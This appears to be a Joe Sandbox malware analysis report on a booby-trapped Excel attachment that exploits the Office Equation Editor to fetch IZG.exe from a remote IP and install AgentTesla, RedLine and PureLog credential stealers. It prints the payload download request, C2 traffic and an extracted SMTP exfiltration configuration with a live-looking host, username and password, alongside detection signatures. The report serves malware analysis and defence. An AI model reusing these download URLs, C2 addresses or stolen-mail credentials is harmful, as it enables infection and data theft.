Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order Request1_5_24.xlam.xlsx

Overview

General Information

Sample name:Order Request1_5_24.xlam.xlsx
Analysis ID:1435095
MD5:8216d3088f8358388dfcbdc7026f2ea1
SHA1:3040eaecd169f745eae12c30652eebc676c3f234
SHA256:37d95e56ed2ab7dbaeae0f8afad3d94ffd9286dee2447ad631b52ecd84a4f47a
Tags:AgentTeslaxlamxlsx
Infos:

Detection

AgentTesla, PureLog Stealer, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected PureLog Stealer
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2308 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 2060 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • OIU.exe (PID: 1996 cmdline: C:\Users\user\AppData\Roaming\OIU.exe MD5: 158C5C0367C262694F3C44AE85B891B6)
        • RegSvcs.exe (PID: 2072 cmdline: C:\Users\user\AppData\Roaming\OIU.exe MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
        • OIU.exe (PID: 1100 cmdline: "C:\Users\user\AppData\Roaming\OIU.exe" MD5: 158C5C0367C262694F3C44AE85B891B6)
          • RegSvcs.exe (PID: 2760 cmdline: "C:\Users\user\AppData\Roaming\OIU.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
          • OIU.exe (PID: 1016 cmdline: "C:\Users\user\AppData\Roaming\OIU.exe" MD5: 158C5C0367C262694F3C44AE85B891B6)
            • RegSvcs.exe (PID: 536 cmdline: "C:\Users\user\AppData\Roaming\OIU.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
            • OIU.exe (PID: 2356 cmdline: "C:\Users\user\AppData\Roaming\OIU.exe" MD5: 158C5C0367C262694F3C44AE85B891B6)
              • RegSvcs.exe (PID: 2216 cmdline: "C:\Users\user\AppData\Roaming\OIU.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
              • OIU.exe (PID: 1376 cmdline: "C:\Users\user\AppData\Roaming\OIU.exe" MD5: 158C5C0367C262694F3C44AE85B891B6)
                • RegSvcs.exe (PID: 2220 cmdline: "C:\Users\user\AppData\Roaming\OIU.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
  • chrome.exe (PID: 2640 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
    • chrome.exe (PID: 1776 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1432 --field-trial-handle=1256,i,7674118080207217716,3458138178017285583,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
  • chrome.exe (PID: 3864 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
    • chrome.exe (PID: 4020 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1440 --field-trial-handle=1200,i,5669568352595894290,4267387126016238941,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.kino2.top", "Username": "serverizu09@kino2.top", "Password": "     XY%R[udi4U]=    "}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x24c3:$s1: <legacyDrawing r:id="
  • 0x24eb:$s2: <oleObject progId="
  • 0x2525:$s3: autoLoad="true"

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.457795747.0000000000120000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    00000003.00000002.457795747.0000000000120000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x700:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 51 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1e9d0:$s5: delete[]
    • 0x1de88:$s6: constructor or from DllMain.
    0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Click to see the 24 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          12.2.RegSvcs.exe.37b7770.6.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            12.2.RegSvcs.exe.37b7770.6.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              12.2.RegSvcs.exe.37b7770.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                12.2.RegSvcs.exe.37b7770.6.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x3ddff:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x3de71:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x3defb:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x3df8d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x3dff7:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x3e069:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x3e0ff:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x3e18f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                12.2.RegSvcs.exe.530000.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 65 entries

                  Sigma Signatures

                  Exploits

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internet
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 23.94.54.101, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2060, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                  Sigma detected: File Dropped By EQNEDT32EXE
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2060, TargetFilename: C:\Users\user\AppData\Roaming\OIU.exe

                  System Summary

                  barindex
                  Sigma detected: Equation Editor Network Connection
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2060, Protocol: tcp, SourceIp: 23.94.54.101, SourceIsIpv6: false, SourcePort: 80
                  Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                  Source: Process startedAuthor: Jason Lynch: Data: Command: C:\Users\user\AppData\Roaming\OIU.exe, CommandLine: C:\Users\user\AppData\Roaming\OIU.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\OIU.exe, NewProcessName: C:\Users\user\AppData\Roaming\OIU.exe, OriginalFileName: C:\Users\user\AppData\Roaming\OIU.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2060, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Roaming\OIU.exe, ProcessId: 1996, ProcessName: OIU.exe
                  Sigma detected: Suspicious Microsoft Office Child Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Users\user\AppData\Roaming\OIU.exe, CommandLine: C:\Users\user\AppData\Roaming\OIU.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\OIU.exe, NewProcessName: C:\Users\user\AppData\Roaming\OIU.exe, OriginalFileName: C:\Users\user\AppData\Roaming\OIU.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2060, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Roaming\OIU.exe, ProcessId: 1996, ProcessName: OIU.exe

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: Order Request1_5_24.xlam.xlsxAvira: detected
                  Found malware configuration
                  Source: 12.2.RegSvcs.exe.300ee8.0.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.kino2.top", "Username": "serverizu09@kino2.top", "Password": " XY%R[udi4U]= "}
                  Multi AV Scanner detection for domain / URL
                  Source: http://23.94.54.101/IZG.exeVirustotal: Detection: 5%Perma Link
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\OIU.exeReversingLabs: Detection: 27%
                  Multi AV Scanner detection for submitted file
                  Source: Order Request1_5_24.xlam.xlsxVirustotal: Detection: 52%Perma Link
                  Source: Order Request1_5_24.xlam.xlsxReversingLabs: Detection: 68%
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\OIU.exeJoe Sandbox ML: detected

                  Exploits

                  barindex
                  Office equation editor establishes network connection
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 23.94.54.101 Port: 80Jump to behavior
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\OIU.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\OIU.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: _.pdb source: RegSvcs.exe, 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: OIU.exe, 00000003.00000003.457625635.0000000002B10000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000003.00000003.457568121.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000005.00000003.460414972.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000005.00000003.460320894.0000000002990000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000007.00000003.462048122.0000000002B20000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000007.00000003.462023023.0000000002950000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000009.00000003.463861681.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000009.00000003.463799420.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 0000000B.00000003.465588880.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 0000000B.00000003.465720630.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,3_2_00C0DBBE
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BDC2A2 FindFirstFileExW,3_2_00BDC2A2
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C168EE FindFirstFileW,FindClose,3_2_00C168EE
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,3_2_00C1698F
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00C0D076
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00C0D3A9
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00C19642
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00C1979D
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,3_2_00C19B2B
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C15C97 FindFirstFileW,FindNextFileW,FindClose,3_2_00C15C97

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Shellcode detected
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035206C1 WriteFile,2_2_035206C1
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03520661 LoadLibraryW,2_2_03520661
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03520867 WinExec,ExitProcess,2_2_03520867
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0352070D WriteFile,2_2_0352070D
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035207B4 WriteFile,WinExec,ExitProcess,2_2_035207B4
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0352062A CreateFileW,2_2_0352062A
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03520729 WriteFile,2_2_03520729
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0352075A WriteFile,2_2_0352075A
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035205DE CreateFileW,2_2_035205DE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03520776 WriteFile,2_2_03520776
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03520617 CreateFileW,2_2_03520617
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0352079A WriteFile,2_2_0352079A
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0352059B CreateFileW,2_2_0352059B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03520582 ExitProcess,CreateFileW,2_2_03520582
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03520887 ExitProcess,2_2_03520887
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035205B7 CreateFileW,2_2_035205B7
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Wed, 01 May 2024 18:27:08 GMTAccept-Ranges: bytesETag: "56802d2df59bda1:0"Server: Microsoft-IIS/8.5Date: Thu, 02 May 2024 02:59:07 GMTContent-Length: 1287680Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cb fc 31 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 f6 09 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 14 00 00 04 00 00 c1 2a 14 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 f4 3a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 13 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 3a 06 00 00 40 0d 00 00 3c 06 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 80 13 00 00 76 00 00 00 30 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                  Source: global trafficHTTP traffic detected: GET /IZG.exe HTTP/1.1Connection: Keep-AliveHost: 23.94.54.101
                  Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
